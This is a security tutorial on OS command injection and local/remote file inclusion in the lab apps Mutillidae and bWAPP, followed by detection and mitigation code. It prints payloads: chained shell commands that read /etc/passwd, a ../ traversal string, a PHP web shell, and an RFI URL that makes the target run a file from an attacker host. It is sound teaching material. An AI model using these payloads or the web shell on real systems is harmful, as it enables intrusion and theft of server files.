
Command Injection & RFI/LFI

Feb 1, 2022

A practical guide on exploiting and mitigating critical server-level vulnerabilities: OS Command Injection and Local/Remote File Inclusion (LFI/RFI). These flaws allow an attacker to execute arbitrary code or read sensitive files from the host operating system.

1. OS Command Injection

This vulnerability occurs when a web application passes unsafe user-supplied data directly to a system shell (through functions such as exec() or system()). Attackers can alter the execution flow with shell "metacharacters" (such as ; and |) to chain their own commands onto the intended one.

Magic Operators

Accessing OWASP Mutillidae, we can test basic reconnaissance payloads:

# Run a second command after the ping (;) or pipe the ping output into it (|); either way the directory listing executes
127.0.0.1 ; pwd
127.0.0.1 | ls -la

# Read the critical Linux user file
127.0.0.1 ; cat /etc/passwd

2. LFI / RFI (Local & Remote File Inclusion)

This vulnerability occurs when an application dynamically includes files selected by URL parameters without proper validation. Attackers can inject filesystem paths to read private files or, when remote inclusion is possible, load code from a server they control.

LFI and Directory Traversal

We use the vulnerable parameter in bWAPP to walk up the server's directory tree with ../ until we reach the filesystem root:

# Escape /var/www/html and read system files
?language=../../../../etc/passwd

RFI and Bindshells

If PHP's allow_url_include=On is set, the risk is critical: we can force the server to include and execute a file hosted on our malicious server.

# 1. Host shell.txt on Kali:
<?php system($_GET['cmd']); ?>

# 2. Force the victim server to execute it:
http://target/bWAPP/rlfi.php?language=http://kali-ip/shell.txt&cmd=whoami
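From the defender's side, the requests shown in sections 1 and 2 leave a recognisable trace in the web server's access log. The following is an added detection example, not code from the original post: it parses combined-format log lines, percent-decodes each query parameter until the value is stable (so double-encoded ..%252f is seen as ../), and tags a request when a parameter contains a '..' path segment, a URL scheme (the RFI case), or a shell metacharacter (the command-injection case). The log lines are constructed samples; 10.0.0.9 replays this page's requests, and the documentation address 198.51.100.7 stands in for the attacker-controlled host. All names and regexes are mine.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in combined log format (not real traffic). 10.0.0.9 replays the
# requests from this page; 198.51.100.7 (a documentation address) stands in for the attacker host.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2022:10:00:01 +0000] "GET /bWAPP/rlfi.php?language=lang_en.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Feb/2022:10:00:02 +0000] "GET /bWAPP/rlfi.php?language=../../../../etc/passwd HTTP/1.1" 200 1824 "-" "curl/7.68.0"
10.0.0.9 - - [01/Feb/2022:10:00:03 +0000] "GET /bWAPP/rlfi.php?language=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1824 "-" "curl/7.68.0"
10.0.0.9 - - [01/Feb/2022:10:00:04 +0000] "GET /bWAPP/rlfi.php?language=http://198.51.100.7/shell.txt&cmd=whoami HTTP/1.1" 200 64 "-" "curl/7.68.0"
10.0.0.5 - - [01/Feb/2022:10:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Feb/2022:10:00:06 +0000] "GET /ping.php?host=127.0.0.1;cat%20/etc/passwd HTTP/1.1" 200 900 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")        # a '..' path segment
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)  # http://, ftp://, php://, data://, ...
SHELL_META_RE = re.compile(r"[;|&`$\r\n]")                       # enough to chain or substitute a command


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %252e%252e%252f is seen as ../ ."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target: str) -> list[str]:
    """Return indicator tags ('kind:parameter') found in the query string of one request target."""
    findings = []
    query = urlsplit(target).query
    for pair in (query.split("&") if query else []):
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        if TRAVERSAL_RE.search(value) or "\x00" in value:
            findings.append(f"lfi-traversal:{name}")
        if SCHEME_RE.match(value):
            findings.append(f"rfi-scheme:{name}")
        if SHELL_META_RE.search(value):
            findings.append(f"cmdi-metachar:{name}")
    return findings


def scan_log(text: str) -> list[dict]:
    """Parse each line and keep the requests whose parameters carry at least one indicator."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these as parse errors
        findings = classify_request(m["target"])
        if findings:
            alerts.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                           "target": m["target"], "findings": findings})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["ip"], a["status"], a["findings"], a["target"])
```

Only the four requests from 10.0.0.9 are flagged; the benign language and page lookups from 10.0.0.5 pass through. The status column matters for triage: a 200 on a traversal request suggests the include actually succeeded, whereas a 404 or 500 is an attempt that the application (or a whitelist map like the one in section 3) already stopped.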

🔴 New Sandbox Available!

I've prepared a Network Emulator (Ping Tool) that is vulnerable to Command Injection. Will you be able to chain a payload to read the /etc/passwd file from my simulated server?

3. Countermeasures

For Command Injection:
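The two rules that close the hole in section 1 are: never let user input reach a shell, and accept only values that look like what the parameter is for. As an added example that is not code from the original post, here is a ping tool's host parameter handled that way in Python. The value must be an IP literal or an RFC 1123-style hostname, and the command runs as an argument vector with no shell involved, so the `;` and `|` payloads above are refused before any process starts. Function and variable names are mine; in PHP the same approach is a strict validation plus escapeshellarg() on a fixed command, instead of string concatenation into system().

```python
import ipaddress
import re
import subprocess

# Hostname shape per RFC 1123: dot-separated labels of 1-63 letters, digits or hyphens,
# not starting or ending with a hyphen, at most 253 characters in total.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def validate_host(value: str) -> str:
    """Return the host if it is an IP literal or a well-formed hostname, else raise ValueError.

    Whitespace, ';', '|', '&', '`', '$', quotes and newlines can never pass either check,
    so the payloads from the Mutillidae example are rejected here, before any process runs.
    """
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))  # IPv4 or IPv6 literal only
    except ValueError:
        pass
    if _HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"rejected host value: {value!r}")


def build_ping_argv(host: str, count: int = 1) -> list[str]:
    """Build the argv list for ping. Each element reaches execve() unchanged; there is no
    shell in the path, so a metacharacter would be literal text even if it got this far."""
    return ["ping", "-c", str(int(count)), validate_host(host)]


def run_ping(host: str, count: int = 1) -> subprocess.CompletedProcess:
    # shell=False is the default; passing a list (not a string) keeps it that way.
    return subprocess.run(build_ping_argv(host, count),
                          capture_output=True, text=True, timeout=15)


def rejected_inputs(values: list[str]) -> list[str]:
    """Which of the given inputs does validate_host() refuse? (helper for the reader)"""
    rejected = []
    for v in values:
        try:
            validate_host(v)
        except ValueError:
            rejected.append(v)
    return rejected


if __name__ == "__main__":
    # The three payloads from section 1 plus one benign host.
    print(rejected_inputs(["127.0.0.1 ; pwd", "127.0.0.1 | ls -la",
                           "127.0.0.1 ; cat /etc/passwd", "127.0.0.1"]))
```

The allowlist regex also rejects values starting with a hyphen, which is what keeps a "host" from being parsed as an extra ping option; that is the argument-injection variant that an argv list alone does not prevent.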

For LFI/RFI:

<?php
// Robust defense against LFI using a Whitelist Map
$allowed_files = ['es' => 'es_lang.php', 'en' => 'en_lang.php'];
$selection = $_GET['lang'] ?? 'es';
include($allowed_files[$selection] ?? $allowed_files['es']);
?>
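The whitelist map above is the strongest option when the set of includable files is fixed. When it is not (a theme or plugin directory, say), the complementary control is a canonicalisation-and-containment check: resolve the requested name against a base directory and refuse anything whose canonical path leaves it. The following is an added Python example, not part of the page's PHP; the base directory /srv/app/lang and all function names are assumptions of the example. Because the decision is made on the resolved path rather than by looking for "../" textually, encoding tricks that hide the dots upstream do not help, and URL schemes (the RFI case) are rejected outright.

```python
from pathlib import Path

# Assumed base directory for this example; a PHP deployment would use its own document root.
LANG_DIR = Path("/srv/app/lang")


def resolve_include(base: Path, requested: str) -> Path:
    """Return the canonical path for `requested` only if it stays inside `base`.

    Raises ValueError for NUL bytes, URL schemes (RFI), absolute paths, and any value whose
    canonical form (after collapsing '..' and following symlinks) leaves the base directory.
    """
    if "\x00" in requested:
        raise ValueError("NUL byte in requested path")
    if "://" in requested:
        raise ValueError("URL schemes are never includable")
    if requested.startswith(("/", "\\")):
        raise ValueError("absolute paths are not allowed")
    base_resolved = base.resolve()
    candidate = (base_resolved / requested).resolve()
    # The containment test on canonical paths is the decision that matters: it does not
    # depend on spotting '../' textually, so encoding games upstream change nothing here.
    if candidate != base_resolved and base_resolved not in candidate.parents:
        raise ValueError(f"path escapes base directory: {requested!r}")
    if candidate.suffix != ".php":
        raise ValueError("only .php files may be included")
    return candidate


def is_includable(requested: str, base: Path = LANG_DIR) -> bool:
    """Boolean view of resolve_include() for callers that only need allow/deny."""
    try:
        resolve_include(base, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for value in ["en_lang.php", "../../../../etc/passwd",
                  "http://198.51.100.7/shell.txt", "sub/../../x.php"]:
        print(f"{value!r}: {'allowed' if is_includable(value) else 'rejected'}")
```

Note that "sub/../en_lang.php" is accepted: the check is about where the path ends up, not whether it contains dots, which is exactly why it survives the double-encoding and NUL-byte variants that a textual filter misses. Combine it with allow_url_include=Off and open_basedir in php.ini so the same boundary is enforced by the runtime as well.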